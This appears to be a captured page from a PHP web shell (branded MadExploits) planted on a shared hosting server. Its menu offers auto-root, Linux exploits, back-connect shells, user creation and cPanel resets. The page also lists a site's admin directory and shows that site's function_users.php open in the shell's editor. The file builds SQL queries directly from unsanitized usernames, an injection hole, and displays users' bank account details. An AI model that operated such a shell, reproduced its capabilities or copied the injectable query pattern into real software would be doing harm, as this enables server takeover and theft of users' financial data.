Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
swift-xpc.com /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
.htaccess
4.65
KB
-rw-r--r--
01admin.zip
112.24
KB
-rw-r--r--
add_user.php
11.21
KB
-rw-r--r--
banner.php
1.41
KB
-rw-r--r--
db.php
30
B
-rw-r--r--
delete.php
357
B
-rw-r--r--
delete_banner.php
736
B
-rw-r--r--
delete_post.php
960
B
-rw-r--r--
delete_user.php
991
B
-rw-r--r--
edit_banner.php
3.38
KB
-rw-r--r--
edit_post.php
11.55
KB
-rw-r--r--
edit_post2.php
5.62
KB
-rw-r--r--
edit_user.php
13.09
KB
-rw-r--r--
editsettings.php
2.61
KB
-rw-r--r--
error_log
54.03
KB
-rw-r--r--
function_users.php
6.8
KB
-rw-r--r--
functions.php
10.92
KB
-rw-r--r--
home.php
6.62
KB
-rw-r--r--
index.php
56
B
-rw-r--r--
insert_banners.php
3.07
KB
-rw-r--r--
insert_post.php
9.63
KB
-rw-r--r--
login.php
1.57
KB
-rw-r--r--
login_admin.php
3.11
KB
-rw-r--r--
logout.php
164
B
-rw-r--r--
member.php
17.64
KB
-rw-r--r--
payment_setting.php
2.97
KB
-rw-r--r--
picupload.php
2.12
KB
-rw-r--r--
post.php
2.02
KB
-rw-r--r--
posts.php
2.94
KB
-rw-r--r--
print_shipment.php
1.91
KB
-rw-r--r--
register_admin.php
8.45
KB
-rw-r--r--
remove_amount.php
1.01
KB
-rw-r--r--
searchmembers.php
2.94
KB
-rw-r--r--
send_email.php
5.02
KB
-rw-r--r--
testimony.php
3.15
KB
-rw-r--r--
upload_files.php
2.59
KB
-rw-r--r--
user_error.php
188
B
-rw-r--r--
user_withdrawal.php
4.99
KB
-rw-r--r--
view_admin.php
2.84
KB
-rw-r--r--
view_banners.php
2.4
KB
-rw-r--r--
view_posts.php
2.85
KB
-rw-r--r--
view_referrals_bonus.php
2.83
KB
-rw-r--r--
view_users.php
4.78
KB
-rw-r--r--
viewconversation.php
5.37
KB
-rw-r--r--
viewmessage.php
2.4
KB
-rw-r--r--
viewmessages.php
4.24
KB
-rw-r--r--
website_setting.php
3.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : function_users.php
<?php function MyPhoto(){ global $con; global $con; $sql= "SELECT photo FROM users WHERE username ='$user' "; $run= mysqli_query($con,$sql); while($row= mysqli_fetch_array($run)){ $myphoto = $row['photo']; } echo $myphoto; } function UserFullname($user){ global $con; $sql= "SELECT fullname FROM users WHERE username ='$user' "; $run= mysqli_query($con,$sql); while($row= mysqli_fetch_array($run)){ $fullname = $row['fullname']; } echo $fullname; } function UserPhoto($user){ global $con; $sql= "SELECT photo FROM users WHERE username ='$user' "; $run= mysqli_query($con,$sql); while($row= mysqli_fetch_array($run)){ $photo = $row['photo']; } echo $photo; } function Updatematch($user){ global $con; $sql= "SELECT matched FROM users WHERE username ='$user' "; $run= mysqli_query($con,$sql); while($row= mysqli_fetch_array($run)){ $matched = $row['matched']; } $matched = $matched+1; $insert_query =mysqli_query($con,"UPDATE users SET matched='$matched' WHERE username='".$user."'"); } function UpdateLevel($user){ global $con; $sql= "SELECT level FROM users WHERE username ='$user' "; $run= mysqli_query($con,$sql); while($row= mysqli_fetch_array($run)){ $level = $row['level']; } $next_level = $level+1; $insert_query =mysqli_query($con,"UPDATE users SET level='$next_level' WHERE username='".$user."'"); } function UpdateLevelHalf($user){ global $con; $sql= "SELECT level FROM users WHERE username ='$user' "; $run= mysqli_query($con,$sql); while($row= mysqli_fetch_array($run)){ $level = $row['level']; } $value= "0.5"; $next_level = $level-$value; $insert_query =mysqli_query($con,"UPDATE users SET level='$next_level' WHERE username='".$user."'"); } function Checkmatch($user){ global $con; $sql= "SELECT matched FROM users WHERE username ='$user' "; $run= mysqli_query($con,$sql); while($row= mysqli_fetch_array($run)){ $matched = $row['matched']; } echo $mod = $matched % 2; } function MatchAdmin($user){ global $con; $sql2 = "SELECT username FROM users WHERE role='admin' "; $run2= mysqli_query($con,$sql2); while($row= mysqli_fetch_array($run2)){ $recipient = $row['username']; } $sql= "INSERT into matching (sender, recipient, status) VALUES ('$user' , '$recipient', 'pending')"; $result=mysqli_query($con,$sql); return $recipient; } function Notify($sender, $message, $recipient){ global $current_time; global $con; $sql= "INSERT into notifications (owner, sender, status, time, message) VALUES ('$recipient' , '$sender', 'unread', ' $current_time', ' $message')"; $result=mysqli_query($con,$sql); $sql= "SELECT email FROM users WHERE username ='$recipient' "; $run= mysqli_query($con,$sql); while($row= mysqli_fetch_array($run)){ $email = $row['email']; } global $webmail; global $site_name; global $domain; $message = $message."<hr/>".$domain; include("../functions/mailer.php"); $mail = new PHPMailer; $mail->From = $webmail; $mail->FromName = $site_name; $mail->addAddress($email); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = " Account Notification"; $mail->Body = $message; if(!$mail->send()){ } else { echo "Message has been sucessfully sent to ".$email; } } function RecieveFrom($user){ global $con; $sql= "SELECT * FROM users WHERE username ='$user' "; $run= mysqli_query($con,$sql); while($row= mysqli_fetch_array($run)){ $photo = $row['photo']; $username = strtolower($row ['username']); $password = $row ['password']; $password2 = $row ['password2']; $fullname = $row ['fullname']; $phone_number = $row ['phone_number']; $gender = $row ['gender']; $location = $row ['location']; $acct_name = $row ['acct_name']; $acct_no = $row ['acct_no']; $bank = $row ['bank']; } ?> <div class="col-md-5 "> <div class="login-panel panel panel-warning"> <div class="panel-body"> <div class="media"> <a class="pull-left" href="#"> <img class="media-object" src="images2/<?php echo $photo?>" class="img-circle" height="100"> </a> <div class="media-body"> <h4 class="media-heading"><?php echo $fullname?></h4> Location: <?php echo $location?> <br/> Phone: <?php echo $phone_number?> <br/> @<?php echo $username?> <br/> </div> </div> <?php } function PayTo($user){ global $con; $sql= "SELECT * FROM users WHERE username ='$user' "; $run= mysqli_query($con,$sql); while($row= mysqli_fetch_array($run)){ $photo = $row['photo']; $username = strtolower($row ['username']); $password = $row ['password']; $password2 = $row ['password2']; $fullname = $row ['fullname']; $phone_number = $row ['phone_number']; $gender = $row ['gender']; $location = $row ['location']; $acct_name = $row ['acct_name']; $acct_no = $row ['acct_no']; $bank = $row ['bank']; } ?> <div class="col-md-5 "> <div class="login-panel panel panel-warning"> <div class="panel-body"> <?php echo $ph_message;?> <div class="media"> <a class="pull-left" href="#"> <img class="media-object" src="images2/<?php echo $photo?>" class="img-circle" height="100"> </a> <div class="media-body"> <h4 class="media-heading"><?php echo $fullname?></h4> Location: <?php echo $location?> <br/> Phone: <?php echo $phone_number?> <br/> Bank:<strong> <?php echo $bank?></strong> <br/> Acct number:<strong> <?php echo $acct_no?></strong> <br/> Acct name:<strong><?php echo $acct_name?></strong> <br/> @<?php echo $username?> <br/><br/> <a href="viewconversation.php?user=<?php echo $username?>&pageno=1"><button class="btn btn-primary" >Send attachment </button></a> </div> </div> </div></div></div></div> <?php } function FriendlyTime($time){ //actaul time $post_date = $time; $actual_date = date('y-m-d, h:ia'); $actual_time=explode(",", $actual_date); $actual_day=explode("-", $actual_time[0]); $actual_same_month = $actual_day[0]."-".$actual_day[1]; //post date $post_time=explode(",", $post_date); $post_day=explode("-", $post_time[0]); $post_same_month = $post_day[0]."-".$post_day[1]; if($post_date == $actual_date){ $newtime= "Just now"; } elseif($post_day == $actual_day){ $newtime= "Today at ".$post_time[1]; } else{ if($actual_day[2]>$post_day[2]){ $days = $actual_day[2]- $post_day[2]; } else{ $days = $post_day[2]- $actual_day[2]; } if($post_same_month==$actual_same_month && $days==1){ $newtime= "Yesterday at ".$post_time[1]; } elseif($post_same_month==$actual_same_month && $days<5){ $newtime= $days." days ago "; } else{ //$newtime = date('D, d/m/Y - h:ia', strtotime($time)); $newtime = date('jS F, Y ', strtotime($time))." at ".$post_time[1];; } return $newtime; } } ?>
Close